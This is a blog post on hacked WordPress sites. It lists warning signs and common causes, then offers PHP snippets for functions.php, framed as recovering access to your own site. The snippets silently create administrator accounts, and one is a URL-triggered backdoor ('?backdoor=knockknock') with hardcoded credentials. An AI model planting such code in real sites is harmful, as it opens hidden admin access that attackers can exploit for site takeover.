WordPress Sites Got Hacked

Do you know that over 100,000 websites get hacked daily? WordPress is a huge blogging platform. There are millions of users and it seems that the number is rapidly growing each and every day. This means that hackers will also put WordPress in a number-one spot when trying to invade any sites.

Usually, if you get hacked, you will know about that instantly. Your site will become inaccessible; you won’t be able to log in and sometimes a hacker will even leave a message on the front page “Hacked by who”. But most often, you might not even notice that something has changed.

If your WordPress site got hacked, it might be very difficult to recover it fully. This is especially true when you have little technical expertise. But, don’t panic and do something foolish. Dealing with a hacked WordPress site is like climbing a mountain or any other challenge.

The Signs of your WordPress Sites Got Hacked

  • You can’t log into your wordpress dashboard
  • Website is blacklisted by Google Safe Browsing
  • Website is blacklisted by Google, Bing, Yahoo and others search engines
  • Host provider had suspended your website
  • Website has been warned for spreading malware
  • Antivirus warned that your site had virus or malware
  • Cyber security personal email you said that your website is being used to attack other sites
  • Suddenly plenty of new users created
  • Your website had generated many redirection to other sites
  • You can’t seems to send emails successfully as hacker using it to spam
  • Additional cron job or scheduled events within your web control panel

This is necessary as when you know how you got hacked, you can secure your website back. Therefore, it is necessary to know how your website got hacked.

Why WordPress Sites Got Hacked

There are plenty of reasons why WordPress sites get hacked, here are some reasons why WordPress websites are popular hacking targets.

  • You are not updating your WordPress, theme, plugins, etc. There are many security vulnerabilities found on WordPress regularly. If you don’t keep your themes, plugins, and version of WordPress up to date, you’re making your site vulnerable.
  • Still using admin as username and weak passwords
  • Never install nulled plugins and themes. It had been designed to cause harm while collect information from your site.
  • Using weak or insecure web hosting might also invite this problem. Therefore, having a secure web hosting is another important part.

How a WordPress Sites Got Hacked

If you want to know more about how WordPress sites get hacked. The purpose of this article is to explain how to hack or regain access to a WordPress site that belongs to you, or that you have rights to edit, admin and access. We’re not responsible for your actions. This guide serves only for educational purposes. Here are the routes a hackers may take to get into your site:

  • Mysql access : If you’re using CPanel, login, open phpMyAdmin and change the administrator passwords and emails are stored in the “wp_users” database table. Or you may create a new administrator (recorded in my previous post here)
  • functions.php : Copy/paste the following code at the end of the file. Mind the closing ?> PHP tags if you have them. They have to be on the last line. So insert the code before them.
$new_user_email = '[email protected]';
$new_user_password = '12345';

if(!username_exists($new_user_email)) {
  $user_id = wp_create_user($new_user_email, $new_user_password, $new_user_email);

  wp_update_user(array('ID' => $user_id, 'nickname' => $new_user_email));

  $user = new WP_User($user_id);
  $user->set_role('administrator');
}

If there’s already a user in WP with that email a new account won’t be created, so make sure it’s new. After saving the file simply open your site, the code will be run, a new account with administrator privileges created and you’ll be able to login with it. After you do so, remember to delete the code from functions.php.

  • Backdoors : these bypass normal methods of accessing your site, e.g. via scripts or hidden files. Open functions.php file. Copy/Paste following code:
add_action('wp_head', 'wploop_backdoor'); 
function wploop_backdoor() {
        If ($_GET['backdoor'] == 'knockknock') {
                require('wp-includes/registration.php');
                If (!username_exists('username')) {
                        $user_id = wp_create_user('name', 'pass');
                        $user = new WP_User($user_id);
                        $user->set_role('administrator');
                }
        }
}
?>

The code will create a new admin on the site then visit the url “http://www.yourdomain.com/?backdoor=knockknock”. After the page was loaded, your new username is “name” and password “pass”. You can change that in the code above by changing “name” and “pass to whatever you want.

  • via FTP : Log into the ftp. Open functions.php file. Copy/Paste following code:
function admin_account(){
$user = 'Username';
$pass = 'Password';
$email = '[email protected]';
if ( !username_exists( $user )  && !email_exists( $email ) ) {
$user_id = wp_create_user( $user, $pass, $email );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
} }
add_action('init','admin_account');

Change username, password, and email to something you like. Once you have saved the changes, you’re done and you can navigate to your WP login panel. Use new information to log back in and once you have verified the account, you can delete the function from the functions.php file.

  • Pharma hacks : an exploit used to insert rogue code into out of date versions of WordPress.
  • Brute-force login attempts : the hackers use automation to exploit weak passwords and gain access to your site.
  • Malicious redirects : backdoors are used to add malicious redirects to your site.
  • Cross-site scripting (XSS) : the most common vulnerability found in WordPress plugins, these inject scripts that then allow a hacker to send malicious code to the user’s browser.
  • Denial of Service (DoS) : errors or bugs in a website’s code are used to overload a website so it no longer can be view or function.

In my next post will help you with steps to clean your site and help you make it more secure and provide you some tips to prevent your WordPress site from being hacked again in the future.

You may also like...